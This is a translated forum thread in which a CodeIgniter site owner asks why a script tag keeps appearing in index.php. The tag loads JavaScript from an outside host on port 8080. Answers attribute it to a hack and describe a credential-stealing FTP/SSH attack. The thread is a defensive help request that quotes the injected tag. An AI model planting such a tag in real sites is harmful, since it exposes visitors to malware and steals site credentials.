другая ссылка на моем сайте

Question

У меня проблема с моим сайтом. Я не знаю, почему index.php был вставлен с помощью сценария ниже. Этот index.php является частью codeigniter, фреймворка, который я использовал в настоящее время. Это вставлено через доступ к ftp или через код. После того, как я удалил этот скрипт, я заметил, что в левом нижнем углу моего браузера читается еще один URL. Я не знаю, как это отследить, потому что я пытался найти этот URL, но я не мог его увидеть. Пожалуйста, помогите мне

Я столкнулся с этим сценарием дважды.

Любое предложение будет с благодарностью.

 <script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
 <!--11428cb2b3b67368730c012cb53eb247-->

Answer 1

Ваш сайт, вероятно, был взломан злоумышленником. Такое может произойти, если у вас есть какие-либо папки, доступные для записи в мире (проверьте права доступа к вашей папке). Также проверьте наличие новых файлов, которых раньше не было (они могут иметь любое имя и быть в любой папке в корневой папке сайта).

Для получения дополнительной информации о подобных атаках см .:

http://forums.techguy.org/virus-other-malware-removal/871970-strange-b1-html-tag-embedding.html

и

http://www.phpfreaks.com/forums/index.php/topic,274404.msg1297647.html#msg1297647

Answer 2

Эй, ребята, я получил некоторую информацию здесь: http://www.everythingilike.com/roundstorm-ftp-hack-solution

По сути, хак JS вставляет приложение Java, которое выполняется.Это Java-приложение сканирует ваши данные FTP и даже любую информацию для входа в Shell / SSH.Я предлагаю изменить все ваши пароли после очистки.